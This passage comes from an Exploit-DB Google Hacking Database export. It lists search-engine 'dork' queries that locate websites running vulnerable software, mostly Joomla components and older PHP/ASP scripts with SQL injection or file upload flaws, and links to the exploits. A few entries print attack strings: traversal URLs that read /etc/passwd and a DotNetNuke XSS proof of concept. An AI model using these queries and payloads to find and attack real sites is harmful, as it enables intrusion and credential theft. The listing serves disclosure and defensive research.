<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2858</id>
<link>https://www.exploit-db.com/ghdb/2858</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_manager</shortDescription>
<textualDescription>Joomla Component com_manager 1.5.3 (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12257</textualDescription>
<query>inurl:com_manager</query>
<querystring>https://www.google.com/search?q=inurl%3Acom_manager</querystring>
<edb>https://www.exploit-db.com/exploits/12257</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1547</id>
<link>https://www.exploit-db.com/ghdb/1547</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_markt</shortDescription>
<textualDescription>Joomla Component (com_markt) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15469</textualDescription>
<query>inurl:com_markt</query>
<querystring>https://www.google.com/search?q=inurl:com_markt</querystring>
<edb>https://www.exploit-db.com/exploits/15469</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2649</id>
<link>https://www.exploit-db.com/ghdb/2649</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_mdigg</shortDescription>
<textualDescription>Joomla Component mdigg 2.2.8 (category) SQL Injection Vuln - CVE: 2008-6149: https://www.exploit-db.com/exploits/7574</textualDescription>
<query>inurl:com_mdigg</query>
<querystring>https://www.google.com/search?q=inurl:com_mdigg</querystring>
<edb>https://www.exploit-db.com/exploits/7574</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3030</id>
<link>https://www.exploit-db.com/ghdb/3030</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_n-forms</shortDescription>
<textualDescription>Joomla Component n-forms 1.01 Blind SQL Injection: https://www.exploit-db.com/exploits/6055</textualDescription>
<query>inurl:com_n-forms</query>
<querystring>https://www.google.com/search?q=inurl:com_n-forms</querystring>
<edb>https://www.exploit-db.com/exploits/6055</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2140</id>
<link>https://www.exploit-db.com/ghdb/2140</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_neorecruit</shortDescription>
<textualDescription>Joomla Component com_neorecruit 1.4 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14570</textualDescription>
<query>inurl:com_neorecruit</query>
<querystring>https://www.google.com/search?q=inurl:com_neorecruit</querystring>
<edb>https://www.exploit-db.com/exploits/14570</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1958</id>
<link>https://www.exploit-db.com/ghdb/1958</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_netinvoice</shortDescription>
<textualDescription>Joomla Component netinvoice 1.2.0 SP1 SQL Injection Vulnerability - CVE: 2008-3498: https://www.exploit-db.com/exploits/5939</textualDescription>
<query>inurl:com_netinvoice</query>
<querystring>https://www.google.com/search?q=inurl:com_netinvoice</querystring>
<edb>https://www.exploit-db.com/exploits/5939</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2424</id>
<link>https://www.exploit-db.com/ghdb/2424</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_pinboard</shortDescription>
<textualDescription>Joomla Component com_pinboard Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/9011</textualDescription>
<query>inurl:com_pinboard</query>
<querystring>https://www.google.com/search?q=inurl:com_pinboard</querystring>
<edb>https://www.exploit-db.com/exploits/9011</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2616</id>
<link>https://www.exploit-db.com/ghdb/2616</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_products &quot;intCategoryId&quot;</shortDescription>
<textualDescription>Joomla com_products 'intCategoryId' Remote Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11691</textualDescription>
<query>inurl:com_products &quot;intCategoryId&quot;</query>
<querystring>https://www.google.com/search?q=inurl:com_products+%22intCategoryId%22</querystring>
<edb>https://www.exploit-db.com/exploits/11691</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2058</id>
<link>https://www.exploit-db.com/ghdb/2058</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_rapidrecipe &quot;recipe_id&quot;</shortDescription>
<textualDescription>Joomla Component rapidrecipe Remote SQL injection Vulnerability - CVE: 2008-2697: https://www.exploit-db.com/exploits/5759</textualDescription>
<query>inurl:com_rapidrecipe &quot;recipe_id&quot;</query>
<querystring>https://www.google.com/search?q=inurl:com_rapidrecipe+%22recipe_id%22</querystring>
<edb>https://www.exploit-db.com/exploits/5759</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2435</id>
<link>https://www.exploit-db.com/ghdb/2435</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_redshop</shortDescription>
<textualDescription>Joomla redSHOP Component v1.0 (com_redshop pid) SQL Injection Vulnerability - CVE: 2010-2694: https://www.exploit-db.com/exploits/14312</textualDescription>
<query>inurl:com_redshop</query>
<querystring>https://www.google.com/search?q=inurl:com_redshop</querystring>
<edb>https://www.exploit-db.com/exploits/14312</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3073</id>
<link>https://www.exploit-db.com/ghdb/3073</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_seminar</shortDescription>
<textualDescription>Joomla Component Seminar 1.28 (id) Blind SQL Injection - CVE: 2009-4200: https://www.exploit-db.com/exploits/8867</textualDescription>
<query>inurl:com_seminar</query>
<querystring>https://www.google.com/search?q=inurl:com_seminar</querystring>
<edb>https://www.exploit-db.com/exploits/8867</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3356</id>
<link>https://www.exploit-db.com/ghdb/3356</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_seyret</shortDescription>
<textualDescription>Joomla Seyret Video Component (com_seyret) Blind SQL Injection: https://www.exploit-db.com/exploits/14172</textualDescription>
<query>inurl:com_seyret</query>
<querystring>https://www.google.com/search?q=inurl:com_seyret</querystring>
<edb>https://www.exploit-db.com/exploits/14172</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1465</id>
<link>https://www.exploit-db.com/ghdb/1465</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_simpleshop</shortDescription>
<textualDescription>Joomla Component simpleshop 3.4 SQL injection Vulnerability - CVE: 2008-2568: https://www.exploit-db.com/exploits/5743</textualDescription>
<query>inurl:com_simpleshop</query>
<querystring>https://www.google.com/search?q=inurl:com_simpleshop</querystring>
<edb>https://www.exploit-db.com/exploits/5743</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1834</id>
<link>https://www.exploit-db.com/ghdb/1834</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_webring</shortDescription>
<textualDescription>Joomla Webring Component 1.0 Remote Include Vulnerability - CVE: 2006-4129: https://www.exploit-db.com/exploits/2177</textualDescription>
<query>inurl:com_webring</query>
<querystring>https://www.google.com/search?q=inurl:com_webring</querystring>
<edb>https://www.exploit-db.com/exploits/2177</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3078</id>
<link>https://www.exploit-db.com/ghdb/3078</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_xewebtv</shortDescription>
<textualDescription>Joomla Component Xe webtv (id) Blind SQL Injection - CVE: 2008-5200: https://www.exploit-db.com/exploits/5966</textualDescription>
<query>inurl:com_xewebtv</query>
<querystring>https://www.google.com/search?q=inurl:com_xewebtv</querystring>
<edb>https://www.exploit-db.com/exploits/5966</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2922</id>
<link>https://www.exploit-db.com/ghdb/2922</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:com_ybggal</shortDescription>
<textualDescription>Joomla Component com_ybggal 1.0 (catid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13979</textualDescription>
<query>inurl:com_ybggal</query>
<querystring>https://www.google.com/search?q=inurl%3Acom_ybggal</querystring>
<edb>https://www.exploit-db.com/exploits/13979</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2674</id>
<link>https://www.exploit-db.com/ghdb/2674</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:couponsite/index.php?page=</shortDescription>
<textualDescription>Coupon Script 4.0 (id) Remote SQL Injection Vulnerability - CVE: 2008-4090: https://www.exploit-db.com/exploits/6348</textualDescription>
<query>inurl:couponsite/index.php?page=</query>
<querystring>https://www.google.com/search?q=inurl:couponsite/index.php%3Fpage%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6348</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4035</id>
<link>https://www.exploit-db.com/ghdb/4035</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:courier/web/ inurl:wmLogin.html filetype:html</shortDescription>
<textualDescription>Identifies Accellion Secure File Transfer servers that may be vulnerable to
https://community.rapid7.com/community/metasploit/blog/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857
@lanmaster53
</textualDescription>
<query>inurl:courier/web/ inurl:wmLogin.html filetype:html</query>
<querystring>https://www.google.com/search?q=inurl:courier/web/ inurl:wmLogin.html filetype:html</querystring>
<edb></edb>
<date>2015-07-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>1178</id>
<link>https://www.exploit-db.com/ghdb/1178</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php</shortDescription>
<textualDescription>Moodle</textualDescription>
<query>inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php</query>
<querystring>https://www.google.com/search?q=inurl%3Acourse%2Fcategory.php+%7C+inurl%3Acourse%2Finfo.php+%7C+inurl%3Aiplookup%2Fipatlas%2Fplot.php</querystring>
<edb></edb>
<date>2005-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1717</id>
<link>https://www.exploit-db.com/ghdb/1717</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:csc_article_details.php</shortDescription>
<textualDescription>CaupoShop Classic 1.3 (saArticle[ID]) Remote SQL Injection Vulnerability - CVE: 2008-2866: https://www.exploit-db.com/exploits/5865</textualDescription>
<query>inurl:csc_article_details.php</query>
<querystring>https://www.google.com/search?q=inurl:csc_article_details.php</querystring>
<edb>https://www.exploit-db.com/exploits/5865</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1996</id>
<link>https://www.exploit-db.com/ghdb/1996</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:CuteSoft_Client/CuteEditor</shortDescription>
<textualDescription>Cute Editor ASP.NET Remote File Disclosure Vulnerability - CVE: 2009-4665: https://www.exploit-db.com/exploits/8785</textualDescription>
<query>inurl:CuteSoft_Client/CuteEditor</query>
<querystring>https://www.google.com/search?q=inurl:CuteSoft_Client/CuteEditor</querystring>
<edb>https://www.exploit-db.com/exploits/8785</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1348</id>
<link>https://www.exploit-db.com/ghdb/1348</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:database.php | inurl:info_db.php ext:php &quot;Database V2.*&quot; &quot;Burning Board *&quot;</shortDescription>
<textualDescription>this is for Woltlab Burning Board 2.x (Datenbank MOD fileid)exploit:http://seclists.org/lists/bugtraq/2006/Mar/0058.html</textualDescription>
<query>inurl:database.php | inurl:info_db.php ext:php &quot;Database V2.*&quot; &quot;Burning Board *&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Adatabase.php+%7C+inurl%3Ainfo_db.php+ext%3Aphp+%22Database+V2.*%22+%22Burning+Board+*%22</querystring>
<edb></edb>
<date>2006-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>6544</id>
<link>https://www.exploit-db.com/ghdb/6544</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:device ext:rsp</shortDescription>
<textualDescription>Google Dork: inurl:device ext:rsp
CVE: CVE-2018-9995
Description: The CVE-2018-9995 vulnerability against IoT
devices. It is able to extract account credentials of DVR, MVR, MDVR, XVR,
NVR etc devices thereby accessing the devices and their video feeds.
Author : Sibi Mathew George
</textualDescription>
<query>inurl:device ext:rsp</query>
<querystring>https://www.google.com/search?q=inurl:device ext:rsp</querystring>
<edb></edb>
<date>2020-09-16</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>692</id>
<link>https://www.exploit-db.com/ghdb/692</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:directorypro.cgi</shortDescription>
<textualDescription>A security vulnerability in the product allows attackers to perform a directory traversal attack and access files that reside outside the normal HTTP root directory.http://target/cgi-bin/directorypro.cgi?want=showcat&amp;show=../../../../etc/passwd%00http://www.securityfocus.com/bid/2793</textualDescription>
<query>inurl:directorypro.cgi</query>
<querystring>https://www.google.com/search?q=inurl%3Adirectorypro.cgi</querystring>
<edb></edb>
<date>2004-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>5192</id>
<link>https://www.exploit-db.com/ghdb/5192</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:dnn.js</shortDescription>
<textualDescription>inurl:dnn.js Reveals Raw Javascript of the Dot Net Nuke CMS of websites that may be vulnerable to XSS ( CVE-2013-4649 ) via searching the page text for the string ' Type.registerNamespace(&quot;dnn&quot;) ' .
Vulnerable versions:
- DNN 7.1.0 and earlier
- DNN 6.2.8 and earlier
POC: http://www.vulnerable.com/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'}</textualDescription>
<query>inurl:dnn.js</query>
<querystring>https://www.google.com/search?q=inurl:dnn.js</querystring>
<edb></edb>
<date>2019-04-23</date>
<author>F1uffyGoat</author>
</entry>
<entry>
<id>1303</id>
<link>https://www.exploit-db.com/ghdb/1303</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:docmgr | intitle:&quot;DocMGR&quot; &quot;enter your Username and&quot;|&quot;und Passwort bitte&quot;|&quot;saisir votre nom&quot;|&quot;su nombre de usuario&quot; -ext:pdf -inurl:&quot;download.php</shortDescription>
<textualDescription>exploit and short explaination: http://retrogod.altervista.org/docmgr_0542_incl_xpl.html</textualDescription>
<query>inurl:docmgr | intitle:&quot;DocMGR&quot; &quot;enter your Username and&quot;|&quot;und Passwort bitte&quot;|&quot;saisir votre nom&quot;|&quot;su nombre de usuario&quot; -ext:pdf -inurl:&quot;download.php</query>
<querystring>https://www.google.com/search?q=inurl:docmgr+%7C+intitle:%22DocMGR%22+%22enter+your+Username+and%22%7C%22und+Passwort+bitte%22%7C%22saisir+votre+nom%22%7C%22su+nombre+de+usuario%22+-ext:pdf+-inurl:%22download.php%22+&amp;filter=0</querystring>
<edb></edb>
<date>2006-02-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>2394</id>
<link>https://www.exploit-db.com/ghdb/2394</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:dpage.php?docID</shortDescription>
<textualDescription>The Real Estate Script (dpage.php docID) SQL Injection Vulnerability - CVE: 2008-2443: https://www.exploit-db.com/exploits/5610</textualDescription>
<query>inurl:dpage.php?docID</query>
<querystring>https://www.google.com/search?q=inurl:dpage.php%3FdocID</querystring>
<edb>https://www.exploit-db.com/exploits/5610</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2887</id>
<link>https://www.exploit-db.com/ghdb/2887</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:e107_plugins</shortDescription>
<textualDescription>e107 Code Exec - CVE: 2010-2099: https://www.exploit-db.com/exploits/12715</textualDescription>
<query>inurl:e107_plugins</query>
<querystring>https://www.google.com/search?q=inurl%3Ae107_plugins</querystring>
<edb>https://www.exploit-db.com/exploits/12715</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1799</id>
<link>https://www.exploit-db.com/ghdb/1799</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:Editor/assetmanager/assetmanager.asp</shortDescription>
<textualDescription>Asset Manager Remote File upload Vulnerability: https://www.exploit-db.com/exploits/12693</textualDescription>
<query>inurl:Editor/assetmanager/assetmanager.asp</query>
<querystring>https://www.google.com/search?q=inurl:Editor/assetmanager/assetmanager.asp</querystring>
<edb>https://www.exploit-db.com/exploits/12693</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2594</id>
<link>https://www.exploit-db.com/ghdb/2594</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:employer_profile.php?compid=</shortDescription>
<textualDescription>ZEEJOBSITE 2.0 (adid) Remote SQL Injection Vulnerability - CVE: 2008-3706: https://www.exploit-db.com/exploits/6249</textualDescription>
<query>inurl:employer_profile.php?compid=</query>
<querystring>https://www.google.com/search?q=inurl:employer_profile.php%3Fcompid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6249</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4038</id>
<link>https://www.exploit-db.com/ghdb/4038</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:EndUserPortal.jsp</shortDescription>
<textualDescription>inurl:EndUserPortal.jsp
It takes you it brings up login pages for the service desk.
https://www.exploit-db.com/exploits/37667/
Author: NumLock90</textualDescription>
<query>inurl:EndUserPortal.jsp</query>
<querystring>https://www.google.com/search?q=inurl:EndUserPortal.jsp</querystring>
<edb>https://www.exploit-db.com/exploits/37667</edb>
<date>2015-07-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>2628</id>
<link>https://www.exploit-db.com/ghdb/2628</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:enq/big.asp?id=</shortDescription>
<textualDescription>(big.asp) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12533</textualDescription>
<query>inurl:enq/big.asp?id=</query>
<querystring>https://www.google.com/search?q=inurl:enq/big.asp%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/12533</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1407</id>
<link>https://www.exploit-db.com/ghdb/1407</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:eStore/index.cgi?</shortDescription>
<textualDescription>this is for eStore directory traversal, example exploit:http://[target]/[path]/eStore/index.cgi?page=../../../../../../../../etc/passwd</textualDescription>
<query>inurl:eStore/index.cgi?</query>
<querystring>https://www.google.com/search?q=inurl%3AeStore%2Findex.cgi%3F&amp;btnG=Cerca+con+Google&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-08-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>3063</id>
<link>https://www.exploit-db.com/ghdb/3063</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:es_offer.php?files_dir=</shortDescription>
<textualDescription>Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4715: https://www.exploit-db.com/exploits/4352</textualDescription>
<query>inurl:es_offer.php?files_dir=</query>
<querystring>https://www.google.com/search?q=inurl:es_offer.php%3Ffiles_dir%3D</querystring>
<edb>https://www.exploit-db.com/exploits/4352</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1748</id>
<link>https://www.exploit-db.com/ghdb/1748</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:etkinlikbak.asp</shortDescription>
<textualDescription>Okul Web Otomasyon Sistemi 4.0.1 Remote SQL Injection Vulnerability - CVE: 2007-0305: https://www.exploit-db.com/exploits/3135</textualDescription>
<query>inurl:etkinlikbak.asp</query>
<querystring>https://www.google.com/search?q=inurl:etkinlikbak.asp</querystring>
<edb>https://www.exploit-db.com/exploits/3135</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3984</id>
<link>https://www.exploit-db.com/ghdb/3984</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:fckeditor -intext:&quot;ConfigIsEnabled = False&quot; intext:ConfigIsEnabled</shortDescription>
<textualDescription>inurl:fckeditor -intext:&quot;ConfigIsEnabled = False&quot; intext:ConfigIsEnabled
Searches for fckeditor default url and which has a config.asp file where configisenabled = true. Unable to search for true value directly because file contains 'example' which could lead to false positive. If found, traversing two directories up to /connectors/ should present an uploadtest.html file.
This may be old, though the existing DORKS didn't call it out specifically, and google still gives a lot of hits.
</textualDescription>
<query>inurl:fckeditor -intext:&quot;ConfigIsEnabled = False&quot; intext:ConfigIsEnabled</query>
<querystring>https://www.google.com/search?q=inurl:fckeditor -intext:&quot;ConfigIsEnabled = False&quot; intext:ConfigIsEnabled</querystring>
<edb></edb>
<date>2015-01-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1734</id>
<link>https://www.exploit-db.com/ghdb/1734</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:flashblog.html OR inurl:/flashblog/</shortDescription>
<textualDescription>FlashBlog 0.31b Remote Arbitrary File Upload Vulnerability - CVE: 2008-2574: https://www.exploit-db.com/exploits/5728</textualDescription>
<query>inurl:flashblog.html OR inurl:/flashblog/</query>
<querystring>https://www.google.com/search?q=inurl:flashblog.html++OR++inurl:/flashblog/</querystring>
<edb>https://www.exploit-db.com/exploits/5728</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1813</id>
<link>https://www.exploit-db.com/ghdb/1813</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:forum_answer.php?que_id</shortDescription>
<textualDescription>AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14986</textualDescription>
<query>inurl:forum_answer.php?que_id</query>
<querystring>https://www.google.com/search?q=inurl:forum_answer.php%3Fque_id</querystring>
<edb>https://www.exploit-db.com/exploits/14986</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2430</id>
<link>https://www.exploit-db.com/ghdb/2430</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:friend.php?op=FriendSend</shortDescription>
<textualDescription>PHP-Nuke 'friend.php' Module Remote SQL Injection: https://www.exploit-db.com/exploits/12525</textualDescription>
<query>inurl:friend.php?op=FriendSend</query>
<querystring>https://www.google.com/search?q=inurl:friend.php%3Fop%3DFriendSend</querystring>
<edb>https://www.exploit-db.com/exploits/12525</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2464</id>
<link>https://www.exploit-db.com/ghdb/2464</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:func=selectcat + com_remository</shortDescription>
<textualDescription>Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability - CVE: 2007-4505: https://www.exploit-db.com/exploits/4306</textualDescription>
<query>inurl:func=selectcat + com_remository</query>
<querystring>https://www.google.com/search?q=inurl:func%3Dselectcat+%2B+com_remository</querystring>
<edb>https://www.exploit-db.com/exploits/4306</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>401</id>
<link>https://www.exploit-db.com/ghdb/401</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:gotoURL.asp?url=</shortDescription>
<textualDescription>ASP Nuke is an open-source software application for running a community-based web site on a web server. By open-source, we mean the code is freely available for others to read, modify and use in accordance with the software license. The requirements for the ASP Nuke content management system are: 1. Microsoft SQL Server 2000 and 2. Microsoft Internet Information Server (IIS) 5.0 (http://www.aspnuke.com/)On 30 Dec. 2003 the hackers Cobac and Alnitak discovered a bug in Asp Nuke (version 1.2, 1.3, and 1.4)Problem : the file addurl-inc.asp included in the file gotourl.asp does not sanitize the input vars and make SQL injection possible.For a examples check the original advisory posted to a spanish forum: http://66.102.11.104/search?q=cache:10-ze5DIJ-UJ:www.elhacker.net/foro/index.php%3Ftopic%3D11830.0%3Bprev_next%3Dprev%22&amp;hl=en(link broken in two lines, glue them together first :-)An attacker can obtain the user and admin passwords by crafting a SQL statement.</textualDescription>
<query>inurl:gotoURL.asp?url=</query>
<querystring>https://www.google.com/search?q=inurl%3AgotoURL.asp%3Furl%3D</querystring>
<edb></edb>
<date>2004-08-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>2233</id>
<link>https://www.exploit-db.com/ghdb/2233</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:gotourl.php?id=</shortDescription>
<textualDescription>PozScripts Classified Auctions (gotourl.php id) SQL Injection Vuln - CVE: 2008-4755: https://www.exploit-db.com/exploits/6839</textualDescription>
<query>inurl:gotourl.php?id=</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:gotourl.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6839</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1571</id>
<link>https://www.exploit-db.com/ghdb/1571</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:guestbook.php &quot;Advanced GuestBook&quot; &quot;powered by phpbb&quot;</shortDescription>
<textualDescription>Advanced GuestBook 2.4.0 (phpBB) File Inclusion Vulnerability - CVE: 2006-2152: https://www.exploit-db.com/exploits/1723</textualDescription>
<query>inurl:guestbook.php &quot;Advanced GuestBook&quot; &quot;powered by phpbb&quot;</query>
<querystring>https://www.google.com/search?q=inurl:guestbook.php+%22Advanced+GuestBook%22+%22powered+by+phpbb%22</querystring>
<edb>https://www.exploit-db.com/exploits/1723</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1835</id>
<link>https://www.exploit-db.com/ghdb/1835</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:hikaye.asp?id=</shortDescription>
<textualDescription>Caner Hikaye Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14419</textualDescription>
<query>inurl:hikaye.asp?id=</query>
<querystring>https://www.google.com/search?q=inurl:hikaye.asp%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/14419</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6100</id>
<link>https://www.exploit-db.com/ghdb/6100</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:human.aspx intext:moveit</shortDescription>
<textualDescription># Google Dork: inurl:human.aspx intext:moveit
# MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection. This dork
is linked to the following existing exploit:
https://www.exploit-db.com/exploits/48316
# Date: 19/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:human.aspx intext:moveit</query>
<querystring>https://www.google.com/search?q=inurl:human.aspx intext:moveit</querystring>
<edb></edb>
<date>2020-05-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3580</id>
<link>https://www.exploit-db.com/ghdb/3580</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:imageview5</shortDescription>
<textualDescription>Imageview 5 (Cookie/index.php) Remote Local Include - CVE: 2006-5554:
https://www.exploit-db.com/exploits/2647</textualDescription>
<query>inurl:imageview5</query>
<querystring>https://www.google.com/search?q=inurl:imageview5</querystring>
<edb>https://www.exploit-db.com/exploits/2647</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2049</id>
<link>https://www.exploit-db.com/ghdb/2049</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_accountlistmanager.asp</shortDescription>
<textualDescription>DMXReady Account List Manager 1.1 Contents Change Vulnerability: https://www.exploit-db.com/exploits/7754</textualDescription>
<query>inurl:inc_accountlistmanager.asp</query>
<querystring>https://www.google.com/search?q=inurl:inc_accountlistmanager.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7754</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2126</id>
<link>https://www.exploit-db.com/ghdb/2126</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_billboardmanager.asp?ItemID=</shortDescription>
<textualDescription>DMXReady Billboard Manager 1.1 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/7791</textualDescription>
<query>inurl:inc_billboardmanager.asp?ItemID=</query>
<querystring>https://www.google.com/search?q=inurl:inc_billboardmanager.asp%3FItemID%3D</querystring>
<edb>https://www.exploit-db.com/exploits/7791</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2165</id>
<link>https://www.exploit-db.com/ghdb/2165</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_catalogmanager.asp</shortDescription>
<textualDescription>DMXReady Catalog Manager 1.1 Remote Contents Change Vuln: https://www.exploit-db.com/exploits/7766</textualDescription>
<query>inurl:inc_catalogmanager.asp</query>
<querystring>https://www.google.com/search?q=inurl:inc_catalogmanager.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7766</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2528</id>
<link>https://www.exploit-db.com/ghdb/2528</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:inc_classifiedlistingsmanager.asp</shortDescription>
<textualDescription>DMXReady Classified Listings Manager 1.1 SQL Injection Vulnerability - CVE: 2009-0426: https://www.exploit-db.com/exploits/7767</textualDescription>
<query>inurl:inc_classifiedlistingsmanager.asp</query>
<querystring>https://www.google.com/search?q=inurl:inc_classifiedlistingsmanager.asp</querystring>
